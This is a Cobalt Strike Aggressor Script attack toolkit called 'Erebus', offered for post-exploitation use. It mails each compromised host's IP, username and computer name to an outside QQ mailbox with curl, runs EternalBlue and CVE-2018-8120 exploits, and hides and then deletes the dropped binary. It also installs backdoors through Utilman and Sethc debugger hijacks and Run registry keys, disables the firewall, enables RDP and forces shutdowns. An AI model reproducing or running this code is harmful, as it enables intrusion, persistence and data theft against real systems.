#auther:S0cke3t

#Config
$From = "1510536500@qq.com";
$To = "1510536500@qq.com";
$UserName = "1510536500@qq.com";
$Password = "xxxxx";#Mailbox Third Party Authorization Code, Not Mailbox Password!
$Switch = "on";
#Config

on heartbeat_5s {
	local('$entry');
	foreach $entry (beacons()) {
		if($entry['last'] > 75000 || (($entry['alive']) eq "false")){
           beacon_remove($entry['id']);
           action("\c4Beacon ".$entry['id']." has gone offline !");
        }
	}
}

on beacon_initial{
    bnote($1, "Bid: ".beacon_info($1, "id")."  Arch: ".beacon_info($1,"barch")."  Ver: ".beacon_info($1,"ver"));
    if ($Switch eq "on"){
        action("\c9Sending Mail......");
        local('$Ip $User $ComName $Arch $Handle $Mail_content');
        $IP = beacon_info($1, "internal");
        $User = beacon_info($1, "user");
        $ComName = beacon_info($1, "computer");
        $Arch = beacon_info($1, "barch");
        $Mail_content = "From:".$From."\r\nTo:".$To."\r\nSubject:CobaltStriker\r\n\r\nIP:".$IP."\r\nUser:".$User."\r\nComputerName:".$ComName."\r\nArch:".$Arch;
        $Handle = openf(">mail.txt");
        writeb($Handle, $Mail_content); 
        @Curl_command = @('curl', '-s' ,'--url','smtp://smtp.qq.com', '--mail-from', $From, '--mail-rcpt', $To, '--upload-file','mail.txt', '--user', $UserName.':'.$Password);
        exec(@Curl_command);
        action("\c9Send Done: ".$ComName."!");
    }    
}


sub ms17_010 {
	$stager = transform(shellcode($3['listener'], false,"x64"),"array");
	bpowershell_import!($bid, script_resource("script/Invoke-EternalBlue.ps1"));
	bpowerpick($bid, "Invoke-EternalBlue -Target $3['Rhost'] $+  -Shellcode @($stager $+ ) -InitialGrooms $3['InitialGrooms'] $+  -MaxAttempts $3['MaxAttempts']");
	}


sub CVE_2018_8120{
    local('$Rch');
    $Rch = "x86";
    if (beacon_info($1,"is64") == 1){
        $Rch = "x64";
    }
    $payload = powershell($2, false, $Rch);
    bupload($1, script_resource("exp/8120/ $+ $Rch $+ .exe"));
    bshell($1, "attrib \"$Rch $+ .exe\" +s +h");
    bshell($1,"$Rch $+ .exe \"".$payload."\"");
    bshell($1,"taskkill /f /im $Rch $+ .exe");
    bshell($1,"del /F /S /Q /AH $Rch $+ .exe");
}

sub InstallBackDoor{
    local('$Prefix $File');
    $Prefix = "\"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\";
    $File = replace($3['CallBackFile'], "\"", "");
    if ($3['Type'] eq "Utilman"){
        $Prefix = $Prefix."Utilman.exe\"";
        bshell($bid,"reg add  $+ $Prefix /f");
        bshell($bid,"reg add  $+ $Prefix /v Debugger /t REG_SZ /d \" $+ $File \" /f ");
    }
    else if($3['Type'] eq "Sethc"){
        $Prefix = $Prefix."Sethc.exe\"";
        bshell($bid,"reg add  $+ $Prefix /f");
        bshell($bid,"reg add  $+ $Prefix /v Debugger /t REG_SZ /d \" $+ $File \" /f ");
    }
    
}
sub InstallAutoRun{
    local('$Prefix $File $Key $Item $Reg');
    $Prefix = "\\Software\\Microsoft\\Windows\\CurrentVersion\\";
    $File = replace($3['CallBackFile'], "\"", "");
    $Key = "\"".$3['RegKey'];
    $Item = $3['RegItem']."\"";
    $Reg = $Key.$Prefix.$Item;
    bshell($bid,"reg add  $+ $Reg /f");
    bshell($bid,"reg add  $+ $Reg /v Svchost /t REG_SZ /d \" $+ $File \" /f ");
}


beacon_exploit_register("Erebus - CVE-2018-8120", "CVE8120", &CVE_2018_8120);


popup beacon_bottom{
    menu "Erebus Tool kit"{
        menu "Pwn"{
            item "EternalBlue"{
                $bid = $1['@'];
                $Dialog = dialog("EternalBlue",%(Rhost => beacon_info($bid,"internal"), InitialGrooms => "12", MaxAttempts => "1", bid => $bid),&ms17_010);
                dialog_description($Dialog, "EternalBlue Attack Target in Power Shell");
                drow_text($Dialog, "Rhost",  "Rhost:");
                drow_listener($Dialog, "listener", "Listener: ");
                drow_text($Dialog, "InitialGrooms",  "InitialGrooms:");
                drow_text($Dialog, "MaxAttempts",  "MaxAttempts:");
                dbutton_action($Dialog, "Exploit");
                dialog_show($Dialog);
            }
        }
        
        menu "Persistent"{

            item "IFEO"{
                if (!-isadmin $1['@']){
                    show_error("Permission Denied!");
                }
                else{
                    $bid = $1['@'];
                    $Dialog = dialog("IFEO",%(Type => "Utilman", CallBackFile => "c:\\Windows\\system32\\cmd.exe",bid => $bid),&InstallBackDoor);
                    dialog_description($Dialog, "Install BackDoor With IFEO");
                    drow_combobox($Dialog,"Type","Type: ", @("Utilman", "Sethc"));
                    drow_text($Dialog,"CallBackFile","CallBackFile: ");
                    dbutton_action($Dialog, "Run");
                    dialog_show($Dialog);
                    
                }
            }

            item "AutoRun"{
                if (!-isadmin $1['@']){
                    show_error("Permission Denied!");
                }
                else{
                    $bid = $1['@'];
                    $Dialog = dialog("Auto Run",%(RegKey => "HKLM", RegItem => "Run", CallBackFile => "C:\\Windows\\system32\\cmd.exe",bid => $bid),&InstallAutoRun);
                    dialog_description($Dialog, "Registry Add Boot Start Item");
                    drow_combobox($Dialog, "RegKey", "Key: ", @("HKLM", "HKCU"));
                    drow_combobox($Dialog, "RegItem", "RegItem: ", @("Run", "RunOnce", "RunServiceOnce"));
                    drow_text($Dialog, "CallBackFile", "CallBackFile: ");
                    dbutton_action($Dialog, "Reg");
                    dialog_show($Dialog);
                }
            }
        }
        item "Get &SYSTEM" {
            binput($1, "getsystem");
            bgetsystem($1);
        }

        item "Turn Off Firewall"{
            if (!-isadmin $1['@']){
                show_error("Permission Denied!");
            }
            else{
                bshell($1, "cmd.exe /C netsh advfirewall set allprofiles state off");
            }
        }

        item "Enable RDP"{
            local('$bid');
            $bid = $1;
            if (!-isadmin $bid['@']){
                show_error("Permission Denied!");
            }
            else{
                bshell($bid,"REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f");
            }
        }

        menu "WMIC"{
            item "Process Detail"{
                local('$bid');
                $bid = $1;
                if ( -isadmin $bid['@'] ){
                    bshell($bid,"wmic process get caption,executablepath,commandline");
                    return;
                }
            }
        }
        menu "Funs"{
            item "Chat"{
                $bid = $1['@'];
                sub Send {
                    $username = replace(beacon_info($bid,"user"),' \*',"");
                    $msg = $3['msg'];
                    if(($username cmp "SYSTEM") == 0){
                        show_error("Cannot send message with SYSTEM !");
                        return;
                    }
                    bshell($bid,"msg $username \"$msg\"");
                }

                $dialog = dialog("Chat", %(msg => "you are hacked !".beacon_info($bid,"id"),bid => $bid), &Send);
                dialog_description($dialog, "Send a message to the host.");
                drow_text_big($dialog,"msg","Message:");
                dbutton_action($dialog, "Send");
                dialog_show($dialog);
            }

            item "Hidden Desktop"{
                bshell($1,"taskkill /F /IM explorer.exe");
            }

            item "Resume Desktop"{
                brun($1, "explorer.exe");
            }
        }

        menu "Power"{
            item "Restart"{
                bshell($1,"shutdown -r -t 0");
            }
            item "Power off"{
                bshell($1,"shutdown -s -t 0");
            }
        }
    }
}

